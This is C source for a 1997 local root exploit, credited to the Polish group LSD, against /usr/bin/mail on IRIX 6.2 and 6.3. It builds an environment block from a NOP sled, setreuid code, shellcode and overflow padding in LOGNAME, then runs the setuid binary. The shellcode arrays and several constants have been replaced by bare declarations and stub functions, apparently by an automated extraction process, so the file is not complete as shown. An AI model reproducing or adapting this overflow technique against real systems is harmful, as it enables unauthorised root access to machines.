
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ADRNUM ;
 int ALLIGN ;
 int NOPNUM ;
 int PCHNUM ;
 int TMPNUM ;
 int execle (char*,char*,int ,char**) ;
 scalar_t__ jump ;
 int * nop ;
 int printf (char*) ;
 void** setreuidcode ;
 void** shellcode ;
 int sprintf (char*,char*) ;
 int strlen (void**) ;
 unsigned long stub1 () ;
 unsigned long stub2 () ;
 unsigned long stub3 () ;

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[3];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland  //lsd-pl.net/\n");
    printf("/usr/bin/mail for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10264+2500+228+228;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10264+112+32356;
    *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10264+7000;

    envp[0]=buffer;
    envp[1]=&buffer[8000];
    envp[2]=0;

    b=buffer;
    sprintf(b,"xxx=");
    b+=4;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    b=&buffer[8000];
    sprintf(b,"LOGNAME=");
    b+=8;
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    *b=0;

    execle("/usr/bin/mail","lsd",0,envp);
}
